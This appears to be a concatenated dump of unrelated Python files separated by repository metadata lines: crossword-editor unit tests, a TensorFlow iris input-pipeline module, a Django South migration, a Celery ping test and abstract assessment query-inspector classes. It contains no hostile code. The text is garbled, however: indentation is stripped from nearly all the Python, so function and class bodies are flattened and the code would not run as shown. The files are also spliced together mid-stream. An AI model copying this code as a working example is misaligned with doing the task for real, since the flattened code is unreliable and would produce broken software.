for key in KEYS:
args = self.grid, (5, 5, "across"), key
actions = editor.determine_editor_actions(*args)
self.assertEqual(len(actions), 1)
self.assertEqual(actions[0].type, "selection")
def testKeyArrowChangeTypingDir(self):
"""When the option is enabled, some arrows keys change typing direction."""
args = self.grid, (5, 5, "down"), gtk.keysyms.Right
actions = editor.determine_editor_actions(*args, arrows_change_dir=True)
self.assertEqual(len(actions), 2)
self.assertEqual(actions[0].type, "selection")
self.assertEqual(actions[1].type, "swapdir")
args = self.grid, (5, 5, "across"), gtk.keysyms.Down
actions = editor.determine_editor_actions(*args, arrows_change_dir=True)
self.assertEqual(len(actions), 2)
self.assertEqual(actions[0].type, "selection")
self.assertEqual(actions[1].type, "swapdir")
def testKeyArrowsChangeTypingDirNot(self):
"""
        The left and up arrow keys are unaffected by the arrows_change_dir option.
"""
for key in [gtk.keysyms.Left, gtk.keysyms.Up]:
for d in ["across", "down"]:
args = self.grid, (5, 5, d), key
actions = editor.determine_editor_actions(*args, arrows_change_dir=True)
self.assertEqual(len(actions), 1)
def testKeyDelete(self):
"""Pressing the delete key results in a char deletion."""
self.grid.set_char(5, 5, 'A')
args = self.grid, (5, 5, "across"), gtk.keysyms.Delete
actions = editor.determine_editor_actions(*args)
self.assertEqual(len(actions), 1)
self.assertEqual(actions[0].type, "chars")
self.assertEqual(actions[0].args, {'cells': [(5, 5, '')]})
def testKeyOthers(self):
"""Pressing other keys may or may not have an action as result."""
args = self.grid, (5, 5, "across"), gtk.keysyms.c
actions = editor.determine_editor_actions(*args)
self.assertEqual(len(actions), 2)
args = self.grid, (5, 5, "across"), gtk.keysyms.equal
actions = editor.determine_editor_actions(*args)
self.assertEqual(actions, [])
def testUserMovesMouse(self):
"""When the user moves the mouse, the current and previous cells are rendered."""
p = Puzzle(Grid(15, 15))
symms = [constants.SYM_HORIZONTAL]
previous = (1, 1)
current = (0, 0)
shift_down = False
mouse_buttons_down = [False, False, False]
result = editor.compute_motion_actions(p, symms, previous, current
, shift_down, mouse_buttons_down)
self.assertEqual(len(result), 1)
self.assertEqual(result[0].type, 'render')
self.assertTrue((0, 0) in result[0].args['cells'])
self.assertTrue((0, 14) in result[0].args['cells'])
self.assertTrue((1, 1) in result[0].args['cells'])
self.assertTrue((1, 13) in result[0].args['cells'])
def testUserPressesShiftAndClicks(self):
"""The user can place a block with shift + left click."""
p = Puzzle(Grid(15, 15))
symms = []
previous = (0, 0)
current = (0, 0)
shift_down = True
mouse_buttons_down = [True, False, False]
result = editor.compute_motion_actions(p, symms, previous, current
, shift_down, mouse_buttons_down)
self.assertEqual(len(result), 1)
self.assertEqual(result[0].type, 'blocks')
self.assertEqual(result[0].args['x'], 0)
self.assertEqual(result[0].args['y'], 0)
self.assertEqual(result[0].args['status'], True)
def testUserPressesShiftAndRightClicks(self):
"""The user can remove a block with shift + right click."""
p = Puzzle(Grid(15, 15))
symms = []
previous = (0, 0)
current = (0, 0)
shift_down = True
mouse_buttons_down = [False, False, True]
result = editor.compute_motion_actions(p, symms, previous, current
, shift_down, mouse_buttons_down)
self.assertEqual(len(result), 1)
self.assertEqual(result[0].type, 'blocks')
self.assertEqual(result[0].args['x'], 0)
self.assertEqual(result[0].args['y'], 0)
self.assertEqual(result[0].args['status'], False)
def testShiftAndBothMouseButtons(self):
"""Holding shift and pressing both mouse buttons does nothing."""
p = Puzzle(Grid(15, 15))
symms = []
previous = (0, 0)
current = (0, 0)
shift_down = True
mouse_buttons_down = [True, False, True]
result = editor.compute_motion_actions(p, symms, previous, current
, shift_down, mouse_buttons_down)
self.assertEqual(result, [])
def testProcessEditorActionsBlocks(self):
"""
When processing a blocks action in the editor,
transform_grid of the window gets called.
"""
window = EditorMockWindow()
a = editor.EditorAction('blocks', {'x': 3, 'y': 3, 'status': True})
editor.process_editor_actions(window, self.puzzle, self.e_settings, [a])
self.assertEqual(window.called, 1)
def testProcessEditorActionsBlocksTwo(self):
"""If a blocks action takes place on an invalid cell, nothing happens."""
window = EditorMockWindow()
a = editor.EditorAction('blocks', {'x': -1, 'y': -1, 'status': True})
editor.process_editor_actions(window, self.puzzle, self.e_settings, [a])
self.assertEqual(window.called, 0)
def testProcessEditorActionsChars(self):
"""
When processing a chars action in the editor,
transform_grid of the window gets called.
"""
window = EditorMockWindow()
a = editor.EditorAction('chars', {'cells': [(3, 3, 'A')]})
editor.process_editor_actions(window, self.puzzle, self.e_settings, [a])
self.assertEqual(window.called, 1)
def testLockedGrid(self):
"""When the grid is locked, no actions can modify the grid."""
window = EditorMockWindow()
self.e_settings.settings["locked_grid"] = True
a1 = editor.EditorAction('blocks', {'x': 3, 'y': 3, 'status': True})
editor.process_editor_actions(window, self.puzzle, self.e_settings, [a1])
self.assertEqual(window.called, 0)
a2 = editor.EditorAction('chars', {'cells': [(3, 3, 'A')]})
editor.process_editor_actions(window, self.puzzle, self.e_settings, [a2])
self.assertEqual(window.called, 0)
def testComputeWordsForDisplay(self):
"""Each word is presented together with score and intersection boolean."""
wlist = word.CWordList(["abcde", "bcdef"])
words = editor.compute_words(Grid(5, 5), [wlist], self.e_settings.selection)
self.assertTrue(("abcde", 0, False) in words)
self.assertTrue(("bcdef", 0, False) in words)
cPalabra.postprocess()
def testComputeWordsForDisplayLengthOne(self):
"""When words are queried for a slot of length 1 then no words are returned."""
g = Grid(3, 3)
g.set_block(1, 0, True)
wlist = word.CWordList(["aaa", "bbb", "ccc"])
words = editor.compute_words(g, [wlist], self.e_settings.selection)
self.assertEqual(words, [])
cPalabra.postprocess()
def testComputeWordsForDisplayInvalidCell(self):
"""When words are queried for an unavailable cell, no words are returned."""
g = Grid(3, 3)
g.set_block(1, 0, True)
wlist = word.CWordList(["aaa", "bbb", "ccc"])
self.e_settings.selection = editor.Selection(1, 0, "across")
words = editor.compute_words(g, [wlist], self.e_settings.selection)
self.assertEqual(words, [])
cPalabra.postprocess()
def testClearSlotOf(self):
"""Clearing a slot clears all characters in that slot."""
g = Grid(3, 3)
CELLS = [(0, 0), (1, 0), (2, 0)]
for x, y in CELLS:
g.set_char(x, y, 'A')
window = EditorMockWindow()
editor.clear_slot_of(window, g, 1, 0, "across")
self.assertEqual(window.called, 1)
for cell in CELLS:
self.assertTrue(g.get_char(*cell), '')
def testClearSlotOfNothingToClear(self):
"""
When there are no characters to remove, transform_grid is not called.
"""
g = Grid(3, 3)
window = EditorMockWindow()
editor.clear_slot_of(window, g, 1, 0, "down")
self.assertEqual(window.called, 0)
def testSlotClearable(self):
"""A slot is clearable if it has chars and it is part of a word."""
g = Grid(3, 3)
g.set_block(1, 0, True)
self.assertEqual(editor.clearable(g, (0, 0, "across")), False)
self.assertEqual(editor.clearable(g, (0, 1, "across")), False)
g.set_char(0, 2, 'A')
self.assertEqual(editor.clearable(g, (1, 2, "across")), True)
# TODO: if user clicks an invalid cell, selection dir must be reset to across
# TODO: if new puzzle is opened, editor settings should be reset
| gpl-3.0 | -653,624,900,040,475,500 | 42.544233 | 108 | 0.60252 | false |
motkeg/Deep-learning | examples/estimator-example-iris/iris_data.py | 4 | 2863 | import pandas as pd
import tensorflow as tf
TRAIN_URL = "http://download.tensorflow.org/data/iris_training.csv"
TEST_URL = "http://download.tensorflow.org/data/iris_test.csv"
CSV_COLUMN_NAMES = ['SepalLength', 'SepalWidth',
'PetalLength', 'PetalWidth', 'Species']
SPECIES = ['Setosa', 'Versicolor', 'Virginica']
def maybe_download():
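    # get_file downloads each CSV once and caches it locally (by default under
    # ~/.keras/datasets), returning the cached file paths.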
train_path = tf.keras.utils.get_file(TRAIN_URL.split('/')[-1], TRAIN_URL)
test_path = tf.keras.utils.get_file(TEST_URL.split('/')[-1], TEST_URL)
return train_path, test_path
def load_data(y_name='Species'):
"""Returns the iris dataset as (train_x, train_y), (test_x, test_y)."""
train_path, test_path = maybe_download()
train = pd.read_csv(train_path, names=CSV_COLUMN_NAMES, header=0)
train_x, train_y = train, train.pop(y_name)
test = pd.read_csv(test_path, names=CSV_COLUMN_NAMES, header=0)
test_x, test_y = test, test.pop(y_name)
return (train_x, train_y), (test_x, test_y)
def train_input_fn(features, labels, batch_size):
"""An input function for training"""
# Convert the inputs to a Dataset.
dataset = tf.data.Dataset.from_tensor_slices((dict(features), labels))
# Shuffle, repeat, and batch the examples.
dataset = dataset.shuffle(1000).repeat().batch(batch_size)
# Return the dataset.
return dataset
def eval_input_fn(features, labels, batch_size):
"""An input function for evaluation or prediction"""
features=dict(features)
if labels is None:
# No labels, use only features.
inputs = features
else:
inputs = (features, labels)
# Convert the inputs to a Dataset.
dataset = tf.data.Dataset.from_tensor_slices(inputs)
# Batch the examples
assert batch_size is not None, "batch_size must not be None"
dataset = dataset.batch(batch_size)
# Return the dataset.
return dataset
# The remainder of this file contains a simple example of a csv parser,
# implemented using the `Dataset` class.
# `tf.decode_csv` sets the types of the outputs to match the examples given in
# the `record_defaults` argument.
CSV_TYPES = [[0.0], [0.0], [0.0], [0.0], [0]]
def _parse_line(line):
# Decode the line into its fields
fields = tf.decode_csv(line, record_defaults=CSV_TYPES)
# Pack the result into a dictionary
features = dict(zip(CSV_COLUMN_NAMES, fields))
# Separate the label from the features
label = features.pop('Species')
return features, label
def csv_input_fn(csv_path, batch_size):
# Create a dataset containing the text lines.
dataset = tf.data.TextLineDataset(csv_path).skip(1)
# Parse each line.
dataset = dataset.map(_parse_line)
# Shuffle, repeat, and batch the examples.
dataset = dataset.shuffle(1000).repeat().batch(batch_size)
# Return the dataset.
return dataset
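# --- Illustrative usage sketch (not part of the original example) ---
# Assuming the TensorFlow 1.x premade estimators, the input functions above
# would typically be wired together roughly as follows; the hyperparameter
# values here (hidden_units, batch_size, steps) are arbitrary placeholders.
def example_train_and_evaluate(batch_size=100, train_steps=1000):
    (train_x, train_y), (test_x, test_y) = load_data()
    # One numeric feature column per CSV feature column.
    feature_columns = [tf.feature_column.numeric_column(key=key)
                       for key in train_x.keys()]
    classifier = tf.estimator.DNNClassifier(
        feature_columns=feature_columns,
        hidden_units=[10, 10],
        n_classes=3)
    classifier.train(
        input_fn=lambda: train_input_fn(train_x, train_y, batch_size),
        steps=train_steps)
    # eval_input_fn makes a single pass over the held-out test set.
    return classifier.evaluate(
        input_fn=lambda: eval_input_fn(test_x, test_y, batch_size))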
| apache-2.0 | -7,948,249,070,987,107,000 | 29.784946 | 77 | 0.66818 | false |
opencorato/write-it | contactos/migrations/0003_auto__add_field_contact_owner.py | 2 | 5781 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Contact.owner'
db.add_column(u'contactos_contact', 'owner',
self.gf('django.db.models.fields.related.ForeignKey')(default=1, to=orm['auth.User']),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Contact.owner'
db.delete_column(u'contactos_contact', 'owner_id')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contactos.contact': {
'Meta': {'object_name': 'Contact'},
'contact_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contactos.ContactType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_bounced': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['popit.Person']"}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '512'})
},
u'contactos.contacttype': {
'Meta': {'object_name': 'ContactType'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'popit.apiinstance': {
'Meta': {'object_name': 'ApiInstance'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'url': ('popit.fields.ApiInstanceURLField', [], {'unique': 'True', 'max_length': '200'})
},
u'popit.person': {
'Meta': {'object_name': 'Person'},
'api_instance': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['popit.ApiInstance']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'popit_url': ('popit.fields.PopItURLField', [], {'default': "''", 'max_length': '200', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'summary': ('django.db.models.fields.TextField', [], {'blank': 'True'})
}
}
complete_apps = ['contactos'] | gpl-3.0 | 5,110,749,738,202,768,000 | 63.244444 | 187 | 0.547829 | false |
EDUlib/edx-platform | openedx/core/djangoapps/service_status/test.py | 4 | 1342 | """Test for async task service status"""
import json
import unittest
from django.test.client import Client
from django.urls import reverse
class CeleryConfigTest(unittest.TestCase):
"""
Test that we can get a response from Celery
"""
def setUp(self):
"""
Create a django test client
"""
super().setUp()
self.client = Client()
self.ping_url = reverse('status.service.celery.ping')
def test_ping(self):
"""
Try to ping celery.
"""
# Access the service status page, which starts a delayed
# asynchronous task
response = self.client.get(self.ping_url)
# HTTP response should be successful
assert response.status_code == 200
# Expect to get a JSON-serialized dict with
# task and time information
result_dict = json.loads(response.content.decode('utf-8'))
# Was it successful?
assert result_dict['success']
# We should get a "pong" message back
assert result_dict['value'] == 'pong'
# We don't know the other dict values exactly,
# but we can assert that they take the right form
assert isinstance(result_dict['task_id'], str)
assert isinstance(result_dict['time'], float)
assert result_dict['time'] > 0.0
| agpl-3.0 | -7,473,054,767,539,127,000 | 25.84 | 66 | 0.611773 | false |
mitsei/dlkit | dlkit/abstract_osid/assessment/query_inspectors.py | 1 | 37418 | """Implementations of assessment abstract base class query_inspectors."""
# pylint: disable=invalid-name
# Method names comply with OSID specification.
# pylint: disable=no-init
# Abstract classes do not define __init__.
# pylint: disable=too-few-public-methods
# Some interfaces are specified as 'markers' and include no methods.
# pylint: disable=too-many-public-methods
# Number of methods are defined in specification
# pylint: disable=too-many-ancestors
# Inheritance defined in specification
# pylint: disable=too-many-arguments
# Argument signature defined in specification.
# pylint: disable=duplicate-code
# All apparent duplicates have been inspected. They aren't.
import abc
class QuestionQueryInspector:
"""The query inspectors provide a means of accessing the match terms of a query.
These interfaces are used to examine the actual query terms used in
a search or that may be used to create a smart catalog. Query
inspectors may be converted to ``OsidQuery`` interfaces for reuse or
modification in the search sessions.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_question_query_inspector_record(self, question_record_type):
"""Gets the record query inspector corresponding to the given ``Question`` record ``Type``.
:param question_record_type: a question record type
:type question_record_type: ``osid.type.Type``
:return: the question query inspector record
:rtype: ``osid.assessment.records.QuestionQueryInspectorRecord``
:raise: ``NullArgument`` -- ``question_record_type`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unsupported`` -- ``has_record_type(question_record_type)`` is ``false``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.records.QuestionQueryInspectorRecord
class AnswerQueryInspector:
"""The query inspectors provide a means of accessing the match terms of a query.
These interfaces are used to examine the actual query terms used in
a search or that may be used to create a smart catalog. Query
inspectors may be converted to ``OsidQuery`` interfaces for reuse or
modification in the search sessions.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_answer_query_inspector_record(self, question_record_type):
"""Gets the record query inspector corresponding to the given ``Question`` record ``Type``.
:param question_record_type: a question record type
:type question_record_type: ``osid.type.Type``
:return: the answer query inspector record
:rtype: ``osid.assessment.records.AnswerQueryInspectorRecord``
:raise: ``NullArgument`` -- ``question_record_type`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unsupported`` -- ``has_record_type(question_record_type)`` is ``false``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.records.AnswerQueryInspectorRecord
class ItemQueryInspector:
"""The query inspectors provide a means of accessing the match terms of a query.
These interfaces are used to examine the actual query terms used in
a search or that may be used to create a smart catalog. Query
inspectors may be converted to ``OsidQuery`` interfaces for reuse or
modification in the search sessions.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_learning_objective_id_terms(self):
"""Gets the learning objective ``Id`` query terms.
:return: the learning objective ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
learning_objective_id_terms = property(fget=get_learning_objective_id_terms)
@abc.abstractmethod
def get_learning_objective_terms(self):
"""Gets the learning objective query terms.
:return: the learning objective terms
:rtype: ``osid.learning.ObjectiveQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.learning.ObjectiveQueryInspector
learning_objective_terms = property(fget=get_learning_objective_terms)
@abc.abstractmethod
def get_question_id_terms(self):
"""Gets the question ``Id`` query terms.
:return: the question ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
question_id_terms = property(fget=get_question_id_terms)
@abc.abstractmethod
def get_question_terms(self):
"""Gets the question query terms.
:return: the question terms
:rtype: ``osid.assessment.QuestionQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.QuestionQueryInspector
question_terms = property(fget=get_question_terms)
@abc.abstractmethod
def get_answer_id_terms(self):
"""Gets the answer ``Id`` query terms.
:return: the answer ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
answer_id_terms = property(fget=get_answer_id_terms)
@abc.abstractmethod
def get_answer_terms(self):
"""Gets the answer query terms.
:return: the answer terms
:rtype: ``osid.assessment.AnswerQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.AnswerQueryInspector
answer_terms = property(fget=get_answer_terms)
@abc.abstractmethod
def get_assessment_id_terms(self):
"""Gets the assessment ``Id`` query terms.
:return: the assessment ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
assessment_id_terms = property(fget=get_assessment_id_terms)
@abc.abstractmethod
def get_assessment_terms(self):
"""Gets the assessment query terms.
:return: the assessment terms
:rtype: ``osid.assessment.AssessmentQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.AssessmentQueryInspector
assessment_terms = property(fget=get_assessment_terms)
@abc.abstractmethod
def get_bank_id_terms(self):
"""Gets the bank ``Id`` query terms.
:return: the bank ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
bank_id_terms = property(fget=get_bank_id_terms)
@abc.abstractmethod
def get_bank_terms(self):
"""Gets the bank query terms.
:return: the bank terms
:rtype: ``osid.assessment.BankQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.BankQueryInspector
bank_terms = property(fget=get_bank_terms)
@abc.abstractmethod
def get_item_query_inspector_record(self, item_record_type):
"""Gets the record query inspector corresponding to the given ``Item`` record ``Type``.
:param item_record_type: an item record type
:type item_record_type: ``osid.type.Type``
:return: the item query inspector record
:rtype: ``osid.assessment.records.ItemQueryInspectorRecord``
:raise: ``NullArgument`` -- ``item_record_type`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unsupported`` -- ``has_record_type(item_record_type)`` is ``false``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.records.ItemQueryInspectorRecord
class AssessmentQueryInspector:
"""The query inspectors provide a means of accessing the match terms of a query.
These interfaces are used to examine the actual query terms used in
a search or that may be used to create a smart catalog. Query
inspectors may be converted to ``OsidQuery`` interfaces for reuse or
modification in the search sessions.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_level_id_terms(self):
"""Gets the level ``Id`` query terms.
:return: the level ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
level_id_terms = property(fget=get_level_id_terms)
@abc.abstractmethod
def get_level_terms(self):
"""Gets the level query terms.
:return: the level terms
:rtype: ``osid.grading.GradeQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.grading.GradeQueryInspector
level_terms = property(fget=get_level_terms)
@abc.abstractmethod
def get_rubric_id_terms(self):
"""Gets the assessment ``Id`` query terms.
:return: the assessment ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
rubric_id_terms = property(fget=get_rubric_id_terms)
@abc.abstractmethod
def get_rubric_terms(self):
"""Gets the assessment query terms.
:return: the assessment terms
:rtype: ``osid.assessment.AssessmentQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.AssessmentQueryInspector
rubric_terms = property(fget=get_rubric_terms)
@abc.abstractmethod
def get_item_id_terms(self):
"""Gets the item ``Id`` query terms.
:return: the item ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
item_id_terms = property(fget=get_item_id_terms)
@abc.abstractmethod
def get_item_terms(self):
"""Gets the item query terms.
:return: the item terms
:rtype: ``osid.assessment.ItemQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.ItemQueryInspector
item_terms = property(fget=get_item_terms)
@abc.abstractmethod
def get_assessment_offered_id_terms(self):
"""Gets the assessment offered ``Id`` query terms.
:return: the assessment offered ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
assessment_offered_id_terms = property(fget=get_assessment_offered_id_terms)
@abc.abstractmethod
def get_assessment_offered_terms(self):
"""Gets the assessment offered query terms.
:return: the assessment offered terms
:rtype: ``osid.assessment.AssessmentOfferedQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.AssessmentOfferedQueryInspector
assessment_offered_terms = property(fget=get_assessment_offered_terms)
@abc.abstractmethod
def get_assessment_taken_id_terms(self):
"""Gets the assessment taken ``Id`` query terms.
:return: the assessment taken ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
assessment_taken_id_terms = property(fget=get_assessment_taken_id_terms)
@abc.abstractmethod
def get_assessment_taken_terms(self):
"""Gets the assessment taken query terms.
:return: the assessment taken terms
:rtype: ``osid.assessment.AssessmentTakenQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.AssessmentTakenQueryInspector
assessment_taken_terms = property(fget=get_assessment_taken_terms)
@abc.abstractmethod
def get_bank_id_terms(self):
"""Gets the bank ``Id`` query terms.
:return: the bank ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
bank_id_terms = property(fget=get_bank_id_terms)
@abc.abstractmethod
def get_bank_terms(self):
"""Gets the bank query terms.
:return: the bank terms
:rtype: ``osid.assessment.BankQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.BankQueryInspector
bank_terms = property(fget=get_bank_terms)
@abc.abstractmethod
def get_assessment_query_inspector_record(self, assessment_record_type):
"""Gets the assessment query inspector record corresponding to the given ``Assessment`` record ``Type``.
:param assessment_record_type: an assessment record type
:type assessment_record_type: ``osid.type.Type``
:return: the assessment query inspector record
:rtype: ``osid.assessment.records.AssessmentQueryInspectorRecord``
:raise: ``NullArgument`` -- ``assessment_record_type`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unsupported`` -- ``has_record_type(assessment_record_type)`` is ``false``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.records.AssessmentQueryInspectorRecord
class AssessmentOfferedQueryInspector:
"""The query inspectors provide a means of accessing the match terms of a query.
These interfaces are used to examine the actual query terms used in
a search or that may be used to create a smart catalog. Query
inspectors may be converted to ``OsidQuery`` interfaces for reuse or
modification in the search sessions.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_assessment_id_terms(self):
"""Gets the assessment ``Id`` query terms.
:return: the assessment ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
assessment_id_terms = property(fget=get_assessment_id_terms)
@abc.abstractmethod
def get_assessment_terms(self):
"""Gets the assessment query terms.
:return: the assessment terms
:rtype: ``osid.assessment.AssessmentQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.AssessmentQueryInspector
assessment_terms = property(fget=get_assessment_terms)
@abc.abstractmethod
def get_level_id_terms(self):
"""Gets the level ``Id`` query terms.
:return: the level ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
level_id_terms = property(fget=get_level_id_terms)
@abc.abstractmethod
def get_level_terms(self):
"""Gets the level query terms.
:return: the level terms
:rtype: ``osid.grading.GradeQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.grading.GradeQueryInspector
level_terms = property(fget=get_level_terms)
@abc.abstractmethod
def get_items_sequential_terms(self):
"""Gets the items sequential query terms.
:return: the boolean terms
:rtype: ``osid.search.terms.BooleanTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.BooleanTerm
items_sequential_terms = property(fget=get_items_sequential_terms)
@abc.abstractmethod
def get_items_shuffled_terms(self):
"""Gets the items shuffled query terms.
:return: the boolean terms
:rtype: ``osid.search.terms.BooleanTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.BooleanTerm
items_shuffled_terms = property(fget=get_items_shuffled_terms)
@abc.abstractmethod
def get_start_time_terms(self):
"""Gets the start time query terms.
:return: the start time terms
:rtype: ``osid.search.terms.DateTimeTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.DateTimeTerm
start_time_terms = property(fget=get_start_time_terms)
@abc.abstractmethod
def get_deadline_terms(self):
"""Gets the deadline query terms.
:return: the deadline terms
:rtype: ``osid.search.terms.DateTimeTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.DateTimeTerm
deadline_terms = property(fget=get_deadline_terms)
@abc.abstractmethod
def get_duration_terms(self):
"""Gets the deadline query terms.
:return: the duration terms
:rtype: ``osid.search.terms.DurationTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.DurationTerm
duration_terms = property(fget=get_duration_terms)
@abc.abstractmethod
def get_score_system_id_terms(self):
"""Gets the grade system ``Id`` query terms.
:return: the grade system ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
score_system_id_terms = property(fget=get_score_system_id_terms)
@abc.abstractmethod
def get_score_system_terms(self):
"""Gets the grade system query terms.
:return: the grade system terms
:rtype: ``osid.grading.GradeSystemQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.grading.GradeSystemQueryInspector
score_system_terms = property(fget=get_score_system_terms)
@abc.abstractmethod
def get_grade_system_id_terms(self):
"""Gets the grade system ``Id`` query terms.
:return: the grade system ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
